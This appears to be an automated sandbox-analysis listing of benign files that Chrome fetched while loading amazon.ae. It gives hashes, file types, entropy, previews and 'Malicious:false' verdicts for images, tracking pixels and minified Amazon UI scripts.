                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:1GXSAVZ7MBDVTNT0VYNB$uedata=s:%2Frd%2Fuedata%3Ful%26v%3D0.295223.0%26id%3D1GXSAVZ7MBDVTNT0VYNB%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D1068%26pc0%3D2161%26ld0%3D2161%26t0%3Dundefined%26sc1%3Dportal-bb%26pc1%3D110%26ld1%3D110%26t1%3Dundefined%26sc2%3Dgw-ftGr-desktop-hero-1-visible%26cf2%3D1348%26pc2%3D1349%26ld2%3D1349%26t2%3Dundefined%26sc3%3DheroAf%26cf3%3D1350%26pc3%3D1350%26ld3%3D1350%26t3%3Dundefined%26sc4%3Dh1Af%26cf4%3D1395%26pc4%3D1395%26ld4%3D1395%26t4%3Dundefined%26sc5%3Ddesktop-grid-1-visible%26cf5%3D1403%26pc5%3D1403%26ld5%3D1403%26t5%3Dundefined%26sc6%3Ddesktop-grid-2-visible%26cf6%3D1840%26pc6%3D1840%26ld6%3D1840%26t6%3Dundefined%26sc7%3Ddesktop-grid-3-visible%26cf7%3D1847%26pc7%3D1847%26ld7%3D1847%26t7%3Dundefined%26sc8%3Ddesktop-grid-1-D1-visible%26cf8%3D1848%26pc8%3D1848%26ld8%3D1848%26t8%3Dundefined%26sc9%3Dadplacements%3A68722d84-42e5-4770-9bd0-3ace4c1af9cc%26bb9%3D2094%26cf9%3D2094%26be9%3D2094%26pc9%3D2166%26ld9%3D-1723729081618%26t9%3Dundefined%26sc10%3Dadplacements%3AGateway%3Aright-2%3Adesktop%26bb10%3D2094%26cf10%3D2094%26be10%3D2094%26pc10%3D2166%26ld10%3D-1723729081618%26t10%3Dundefined%26sc11%3Ddesktop-grid-4-visible%26cf11%3D2181%26pc11%3D2181%26ld11%3D2181%26t11%3Dundefined%26sc12%3Ddesktop-grid-5-visible%26cf12%3D2185%26pc12%3D2185%26ld12%3D2185%26t12%3Dundefined%26sc13%3Ddesktop-grid-6-visible%26cf13%3D2190%26pc13%3D2190%26ld13%3D2190%26t13%3Dundefined%26sc14%3Ddesktop-grid-7-visible%26cf14%3D2237%26pc14%3D2238%26ld14%3D2238%26t14%3Dundefined%26sc15%3DspLoadJs%26cf15%3D2266%26pc15%3D2266%26ld15%3D2266%26t15%3Dundefined%26sc16%3DnavCF%26cf16%3D2266%26pc16%3D2266%26ld16%3D2266%26t16%3Dundefined%26sc17%3DcsmCELLSframework%26bb17%3D2728%26pc17%3D2728%26ld17%3D2728%26t17%3Dundefined%26sc18%3DcsmCELLSpdm%26bb18%3D2729%26pc18%3D2740%26ld18%3D2740%26t18%3Dundefined%26sc19%3DcsmCELLSvpm%26bb19%3D2740%26pc19%3D2740%26ld19%3D2740%26t19%3Dundefined%26sc20%3DcsmCELLSfem%26bb20%3D2740%26pc20%3D2740%26ld20%3D2740%26t20%3Dundefined%26sc21%3Due_sushi_v1%26bb21%3D2741%26pc21%3D2741%26ld21%3D2741%26t21%3Dundefined%26sc22%3Ddesktop-1-visible%26cf22%3D3413%26pc22%3D3413%26ld22%3D3413%26t22%3Dundefined%26sc23%3Ddesktop-btf-grid-1-visible%26cf23%3D3413%26pc23%3D3413%26ld23%3D3413%26t23%3Dundefined%26sc24%3Ddesktop-btf-grid-2-visible%26cf24%3D3413%26pc24%3D3413%26ld24%3D3413%26t24%3Dundefined%26sc25%3Ddesktop-btf-grid-3-visible%26cf25%3D3413%26pc25%3D3413%26ld25%3D3413%26t25%3Dundefined%26sc26%3Ddesktop-btf-grid-4-visible%26cf26%3D3413%26pc26%3D3413%26ld26%3D3413%26t26%3Dundefined%26sc27%3Ddesktop-3-visible%26cf27%3D5541%26pc27%3D5541%26ld27%3D5541%26t27%3Dundefined%26sc28%3Ddesktop-btf-grid-6-visible%26cf28%3D5608%26pc28%3D5608%26ld28%3D5608%26t28%3Dundefined%26sc29%3Ddesktop-btf-grid-5-visible%26cf29%3D6238%26pc29%3D6238%26ld29%3D6238%26t29%3Dundefined%26sc30%3Ddesktop-btf-grid-7-visible%26cf30%3D6285%26pc30%3D6285%26ld30%3D6285%26t30%3Dundefined%26sc31%3Ddesktop-4-visible%26cf31%3D6519%26pc31%3D6519%26ld31%3D6519%26t31%3Dundefined%26sc32%3Ddesktop-btf-grid-8-visible%26cf32%3D6832%26pc32%3D6832%26ld32%3D6832%26t32%3Dundefined%26sc33%3Ddesktop-5-visible%26cf33%3D7874%26pc33%3D7874%26ld33%3D7874%26t33%3Dundefined%26ctb%3D1:7929
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):7392
                                                                                                                                                                                                        Entropy (8bit):7.9021818738045475
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TEegS7yGGUiL0gxXX9aWaS4A5uaFCnGqroykuMCN3tBlYSzVoHqnJM0O0FkwT0Dr:9v7ykaJaSbUn0urVtBeSZoHqJMe3S
                                                                                                                                                                                                        MD5:1BFFEA9E3D0E8E2B1B8B7F784E595330
                                                                                                                                                                                                        SHA1:33C36E6B852CC348DC06E5C8B5F530F5F5E32401
                                                                                                                                                                                                        SHA-256:6CA15CC6150681B00D57822B1F2545412CEEE9199A010FDA3BF8DD2A38295130
                                                                                                                                                                                                        SHA-512:FFB6D43AD6A72B9EEF0B4D9E22F9A10BA1459FA329B5B18CA5F885768F1018517F9BF55989DF54085F03B8EFD86CC606713AC37427B4D3F0679A3B89872C14A4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/41mCsNYIizL.AC_SX250.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................,.....6...=1.4..)..4.I.7M...v:.z.\.52.....I.3Ql,......h.Y.......l.}-..g..@.<.I%".U....6..|.j.8..C.@./..L.J6.I.........E.D...W.....<<%>)..[.d...%......4. .\D..Q...@o.........1K.4.....^........D.mq2.J....k..%..A.u.u^.O..0........X...C..m._...n!.....6.q...$......%.Z...l.q.o.R..p........(.."o.>{i.y$...H.]L.X...{w.o2..4Y..d...ps..n}N.......<.5|.........L.&==.r..{.AG.gz.....)....9......"....K.`..f..G{R^.........|..^..2.k..v.W.j.....q.rO|....._r<mm..(..r...*.f....~..l-.+O!Me..[+FgD.^.\.,!..Y...........\...X.!....._.~t.su.Iy....Sc...%2.H....*.....a.S..[.C._O..<gi.A...k....'.....-r.m......}e.O....Ec..o....2OQ..:.e|...,....q?7....a[............hZ.K...O...]......2....k.....]k' ..../....\|.../mB.b.r=.H..j0.oN....X.}..J...........K.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (596)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):739306
                                                                                                                                                                                                        Entropy (8bit):5.57731338831324
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:iu6Pm2tOPdA7gBQ9DtRqcgNTilgo1Y3vTH9aGauo/m9tfnt8Tc:iTPmE7IQ9DtRqcgMlgo1Y3bHrcWqc
                                                                                                                                                                                                        MD5:92625FD343A9F645D82EDC259581A4A8
                                                                                                                                                                                                        SHA1:FCF8F410E442DA15511CF466CC64CA22A56A233A
                                                                                                                                                                                                        SHA-256:1984A08DA60D84AD88855992B41B4A09EEB44AAD7184234FCBFAE7BA66D98E77
                                                                                                                                                                                                        SHA-512:FEB06843CD59D1B0215F8ABD0D66A7817DF0964F73E75531822695B0F8DD31E18C85274585939D02912C5223D1D6FE49C4C8769792323B85693441BF513F9BF4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://images-eu.ssl-images-amazon.com/images/I/411x8BHUrFL._RC%7C71xP0umV4JL.js,01gK5H1EnXL.js,01phmzCOwJL.js,01eOvPdxG7L.js,71xoLvkbbjL.js,41jBieyCvYL.js,01wXnKULArL.js,01+pnQJuQ0L.js,21fcR05bSUL.js,41rnk3z1gYL.js,51H8vCDt+dL.js,31J-NEfNY0L.js,11lEMI5MhIL.js,31+UifI0MIL.js,71-pKfDl0GL.js,41aCLC6fiuL.js,01VYGE8lGhL.js_.js?AUIClients/NavDesktopUberAsset&HUTipDuy"
                                                                                                                                                                                                        Preview:(function(y){var f=window.AmazonUIPageJS||window.P,p=f._namespace||f.attributeErrors,d=p?p("NavSharedAssets",""):f;d.guardFatal?d.guardFatal(y)(d,window):d.execute(function(){y(d,window)})})(function(y,f,p){(function(d){if(!d.$Nav||d.$Nav._replay){document.createElement("header");var a=function(){this.data={}},c=function(a){c.manager.add(a)};a.arrayAdder=function(a){return function(){this.data[a]=(this.data[a]||[]).concat([].slice.call(arguments));return this}};a.prototype={build:function(a,b){this.data.name=.a;this.data.value=b;this.data.immediate=!1;this.data.process=!0;c.manager.add(this.data)},run:function(a,b){b&&(this.data.name=a);this.data.value=b||a;this.data.process=!0;c.manager.add(this.data)},publish:function(a,b){this.data.name=a;this.data.value=b;c.manager.publish(this.data)},declare:function(a,b){this.data.name=a;this.data.value=b;c.manager.add(this.data)},when:a.arrayAdder("when"),iff:a.arrayAdder("iff"),filter:a.arrayAdder("filter"),observe:a.arrayAdder("observe")};var
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2939
                                                                                                                                                                                                        Entropy (8bit):7.854205744631827
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6iGRXUU2QvrcpMbhjcyMU7B5i99JpnVFL5zdPB1Qnu9oGaWLTD6Ms+ZI:TqOEKjcCNcXO509J5d1Mw6P
                                                                                                                                                                                                        MD5:4C56397C1B8592F275D65A88A46FD2DE
                                                                                                                                                                                                        SHA1:F85F68FF270455D4234E7465DC8175D04CCE1DFF
                                                                                                                                                                                                        SHA-256:6B09C0115CD20D332D985AF2F72A6D29E0EA95C5D3E5BF2AC033CEB3D0C8A768
                                                                                                                                                                                                        SHA-512:5A826D801ACCF134633F1BC04FF7FB62E4AD4A26B08BC8F3EF95560E18F0356922764216D9E7BB52EF82A8D768584D66EAE5EB8212B7CD09BDDCBA6709B14D45
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621422_372x232_2X_en_AE._SY116_CB582980067_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1.."....#2AQRt......$35BESqr.....DTUa..%CF..cd...............................................!Qa...12"Rb.............?..h....................a.AA.~+/..b.Z_.....U......qi|..PPEf..+*x.."..=.e`.h.;.|&.lW.....................+S.$.i...AT...h..}.U.N-....u?.G....^.j..5RAS.VT|;5..+.].,....!..2}+....;.$..F..o|.ncsy...w..:Lj.[U.c.....1[...o$N..x..y..)..)..kjL.n{^...v..EL.;.]...]..\.. .o. ...........y...X..<O`$.x.+......Tb.=;"dY.R...,.&.T.+.0..........q.FJ..@.6..t...........6..gt...-.Y3...........7.Q...t....9.Om.b$..{H5P..xh.Dm..KUZk.s........nu.{....Nq'`#I....0..|.t.gW.)Fl....i.....D..pzL}%....9.3_.^.Y.^Y.42n.g....u....1...Y.._...jN..>.._j..O.slWke...)..DO,."...d.........*...........Nd.....m....1.V.)m..i.tyJ...v..{.<.{..2.o.3Y..g....:z...t...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):813
                                                                                                                                                                                                        Entropy (8bit):1.6642092553022059
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PvFvvF3fFvvvF3t/NvXvXvXvFvNvf1/3/VXvXvXvXvFvNvfV/dN/NvXvXvXvFvNn:eHFLinQPyn1zIXGvv3
                                                                                                                                                                                                        MD5:021412A9D349D488D1500968D3A8E745
                                                                                                                                                                                                        SHA1:457D01D5D9C8BAC326A4E59BA847B9EDBEDD18B5
                                                                                                                                                                                                        SHA-256:E2390201730466B2899F8CFCC73C30C32E2891FC3ECC007DC9A8D63838E575F4
                                                                                                                                                                                                        SHA-512:122B990D87026299F84626EA1D58324647BF4C92F632A9C661B7BD13BCCAFA739AA17C6A05FA7EFA73C441472E6859132E21B4EB79F95249B7659A9C23C87CCB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/gp/cart/checkout-prefetch.html?cartInitiateId=1723729136538
                                                                                                                                                                                                        Preview:.. . . . ............................................................................................................................................................................................................................................... . . . . . ................ . . . . . . . ............................................................................................... ... . . . . . . . ........... .... . . . . . . . .................. . . . . . . . . ........... ................................................................................ ............{"prefetchSuppressionReason":"CheckoutPrefetch:prefetch-pipedata:ZeroCustomerId"}....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ctb%3D1%26ic%3D2%26sc0%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb0%3D404%26pc0%3D4455%26ld0%3D4455%26t0%3D1723729120984%26csmtags%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:4454
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):58473
                                                                                                                                                                                                        Entropy (8bit):7.990697562617293
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:XMLx7O/6Kt5aKCApKdY5XqQqGhGhgElVSijmqgoEZ9jRh:8l7/fKdpj6ndh9XBgoEjlh
                                                                                                                                                                                                        MD5:6F63CECF6A3E453ED43AE2746470D0BC
                                                                                                                                                                                                        SHA1:61D93AB591BA679FE0E30F0F644F1AAB82388619
                                                                                                                                                                                                        SHA-256:C16E36E015A8FC30B323E0CA9B58446977D94F601B6C57F29BD150DB9117B095
                                                                                                                                                                                                        SHA-512:01E2F9C0620B1B488CCD970208315A4D07A6CD42881D908CE62DE9F87C85B11BC44C430343B88471F5DD2B770A3171C2FE5DC45F394E34DEA21211D56F05D00E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_12_drawing_en._CB568181090_.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U.....Q...........R.....T..S........V..P..O.............M.....N........................L.........".=.............................%1@#/>.....'3B..........V........Y....................$0?.....#3. 0..(.....L +;.....)......)8.......$..........................................!*5D.&6...............P.....Q............J..............;FS..-..........0:I[dpMUy.....go{...gp.......ck.oy......U^...l..x......y......eT\k........GOo..........\ox...WZc.....r.................z.....................................?Fg.........z......py.6>P..b.............7=]..........LUc........W-4S..,.....<........X....>FO^..a..S..M...$+I...............?FXBJ[..w........2.......R.............. .....J..2..Y..r... .IDATx..[A..H.lv..V......./.l`.......u..._.......E...,0.,.[MR...pdFDf.}...o......._;.}..............3.W.o_8>.>....|..|z....9................O}.v{.X.iZ.G.Y.5.}/g.._q.G.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1164)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):92622
                                                                                                                                                                                                        Entropy (8bit):5.499495828086525
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:itJNHcVgncVumON9qk+qC/qgKqJzqdG2utZO:4Hc+VN4kPCig7JWdG2F
                                                                                                                                                                                                        MD5:BE2B85095796B889952BB0E9D47D8C6D
                                                                                                                                                                                                        SHA1:E5A8312BD96A8CB015173BEFD135D2AC90FA931A
                                                                                                                                                                                                        SHA-256:0AF70BB1962F3DF64FA9EFBBEFC1DD9B3D4B41B75147A3C424EE6764F37A501B
                                                                                                                                                                                                        SHA-512:B1569B108FDF10CE71FB2517EB3A76089CA204FCD20CD46F8EF842D9B3F1F358007D890A8A7BFD497CEA65568AB6163D8198E5D5D837840F022C73EDFA84CFE1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/61O+a0St5IL.js?AUIClients/SocialShareWidgetAUI
                                                                                                                                                                                                        Preview:(function(t){var h=window.AmazonUIPageJS||window.P,k=h._namespace||h.attributeErrors,M=k?k("SocialShareWidgetAUI","AmazonUI"):h;M.guardFatal?M.guardFatal(t)(M,window):M.execute(function(){t(M,window)})})(function(t,h,k){function M(e){if(Array.isArray(e)){for(var k=0,h=Array(e.length);k<e.length;k++)h[k]=e[k];return h}return Array.from(e)}"use strict";"use strict";t.register("SocialShareWidget",function(){var e;(function(){var k={353:function(e,a,n){Object.defineProperty(a,"__esModule",{value:!0});.var c=n(905),b=n(738);e=function(){function a(){var c=this;this.generateTimestampCollection=function(){var a=(new Date).getTimezoneOffset();a=c.getDateTimeByOffset(a);var d=c.getDateTimeByOffset(0);return{hitDay:a.split("T")[0],hitDatetime:a,hitDatetimeUtc:d}};this.getMarketplaceId=function(a){return"string"==typeof a?a:h.ue&&h.ue.mid?h.ue.mid:b.CSA_DEFAULT_VALUE.string};var d=this.generateTimestampCollection();this.csaMetricsData={schemaId:a.CSA_SCHEMA_ID,userAgentId:b.CSA_DEFAULT_VALUE.numb
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:C source, ASCII text, with very long lines (588)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):181399
                                                                                                                                                                                                        Entropy (8bit):5.399051155560123
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:IGzkM/QFPYtKY187v/5ZvhklTPi2AuxKz9aw:IfM/QFPC87v/5ZvmlTPi27KJaw
                                                                                                                                                                                                        MD5:7463929BE5B9B6885531A8533A735A30
                                                                                                                                                                                                        SHA1:1A35515A5E81C131B3830ABB10BF477655EEAC9B
                                                                                                                                                                                                        SHA-256:71F3A3417A1EE737343E91FF370F0CA0BB3C657DFAA02D76FD2E3E3365EDD79D
                                                                                                                                                                                                        SHA-512:A34EEC469DA5814766942B86A984D455C5D1B769C52326C1967A330ED16B3FA22D2EF5FE5FD375668F0FD809F9D1665905857957276F07E989B76CDAEB3F8919
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/71Xz7bVEorL.js?AUIClients/IdentityWebAuthnAssets
                                                                                                                                                                                                        Preview:/*. regenerator-runtime -- Copyright (c) 2014-present, Facebook, Inc. -- license (MIT): https://github.com/facebook/regenerator/blob/main/LICENSE */.(function(J){var x=window.AmazonUIPageJS||window.P,n=x._namespace||x.attributeErrors,I=n?n("IdentityWebAuthnAssets",""):x;I.guardFatal?I.guardFatal(J)(I,window):I.execute(function(){J(I,window)})})(function(J,x,n){var I=function(){return function(r,x){if(Array.isArray(r))return r;if(Symbol.iterator in Object(r)){var F=[],I=!0,b=!1,c=n;try{for(var a=r[Symbol.iterator](),e;!(I=(e=a.next()).done)&&(F.push(e.value),!x||F.length!==x);I=!0);}catch(g){b=!0,c=g}finally{try{if(!I&&a["return"])a["return"]()}finally{if(b)throw c;.}}return F}throw new TypeError("Invalid attempt to destructure non-iterable instance");}}(),r="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"===typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},ca;(function(){function F(b
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (64565)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):331197
                                                                                                                                                                                                        Entropy (8bit):5.457377606315039
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:5w70TUq0mTaL+gsW5MmGaW5gERNmJAK/OaZ05Z:5MRSW5aaW5grJAKrZ05Z
                                                                                                                                                                                                        MD5:8D11E1344E8D218C563D06A64C47EE02
                                                                                                                                                                                                        SHA1:FC949176844C9C12D7AE368311EF1B832DEDDA2E
                                                                                                                                                                                                        SHA-256:FF7231C17F8AC6BB63F69FEEE9F023841DF9D2F8534E0ECCA62E5C8FE376E1BA
                                                                                                                                                                                                        SHA-512:522D4DF630C41CFADBDD966A87419BCC57D5F3FAC2B1C1026C3C11312442144B7A69721FA25914E8F287C93F42C89662571891FA0C2F71B2C9447A934D594F7C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/8150jbgvn9L.js?AUIClients/SiegeClientSideEncryptionAUI
                                                                                                                                                                                                        Preview:;(function(f) {. if (typeof window !== 'undefined') {. . return P.execute('siege-cse', function() {. try {. f();. P.declare('siege-cse', window.SiegeCrypto);. } catch (e) {. try {. . if (window.callPhantom && (!Function.prototype.bind || Function.prototype.bind.toString().replace(/bind/g, 'Error') != Error.toString())) {. console.log('siege-cse does not support PhantomJS 1.x, skipping error reporting');. return;. }. } catch (e) {}.. P.logError(e, 'siege-cse init error: ', 'WARN', 'siege-cse');. return;. }. });. } else if (typeof importScripts !== 'undefined') {. . return f();. } else {. throw new Error('Cannot initialize SiegeCrypto outside window or worker');. }.})(function() {. /////////////////////////.// BEGIN FILE SiegeCrypto.js./////////////////////////./*...Full source (including license, if applicable) included below..*/.!function(e,t){"object"==typeo
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (512)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):768
                                                                                                                                                                                                        Entropy (8bit):5.18006490302809
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:2kjZ/xqKnc5OLxypEKBAoIjGw+iKS0JBJxBfeNfiR3:2WZ/x3nijTBAozw7KhJneNfiR
                                                                                                                                                                                                        MD5:A31DABB0EF509DB9ACA5DA627458A90F
                                                                                                                                                                                                        SHA1:1CE1E27C2484DBB446D234162E700DC24D476DDF
                                                                                                                                                                                                        SHA-256:4C6029DEAEFEC0EC6726442FA6BF84EF5D28C40ABCA62DBEFE8E61FEFB09BEA8
                                                                                                                                                                                                        SHA-512:A83523A9963581977A9CEE6F75D3FF46014CB60CDADE77BD98271662F73A726EB5D96D9EA5EEB4C9C42BBD29F2DAAF1816A5EB3CCB5801F59E2575593F824238
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01saU+uyHrL.js?AUIClients/SmxCartAssets
                                                                                                                                                                                                        Preview:(function(b){var d=window.AmazonUIPageJS||window.P,c=d._namespace||d.attributeErrors,a=c?c("SmxCartAssets",""):d;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,d,c){b.when("A","a-secondary-view","Cart","ready").execute(function(a,b,d){a.declarative("smx-secondary-view","click",function(a){var e=a&&a.data||{},c=b.get("item-max-savings-ajax");c||(c=b.create(a.$target,{name:"item-max-savings-ajax",synchronous:!1,url:e.ajaxUrl+"?asin\x3d"+e.asin+"\x26isLightningDeal\x3d"+.e.isLightningDeal+"\x26merchantId\x3d"+e.merchantId}));c.show();d.logUECounter("item-max-savings-primary-ingress-click")});a.on("a:popover:afterHide:item-max-savings-ajax",function(){b.get("item-max-savings-ajax")&&b.remove("item-max-savings-ajax")})})});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 250x156, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4690
                                                                                                                                                                                                        Entropy (8bit):7.904472030157054
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TWhTQ92eMufXFIn7mH/PqXx4GqvlsxvVdb6NlDmrK+A6kZu0VC4c7V:KhTQZfXFH/yxwGslDS86oBVCz
                                                                                                                                                                                                        MD5:62C45993D4169F0B50D7C471E58D2D6D
                                                                                                                                                                                                        SHA1:178C1B284E1BDD43BA7A65C42C55C4D2A63433A6
                                                                                                                                                                                                        SHA-256:F557A9D5BC005B684A5FC3E56F0304C98AE04F85EDFD90727E763E9024F80EF2
                                                                                                                                                                                                        SHA-512:4757F12822FEE14FBFC7CB087A322262BDDEFCEF8E1274D710D01ADE93C359111841CD69883EEDC0CF917A4FE23D5A8B05B3641279F11C3A3C1A359B9C5C31F3
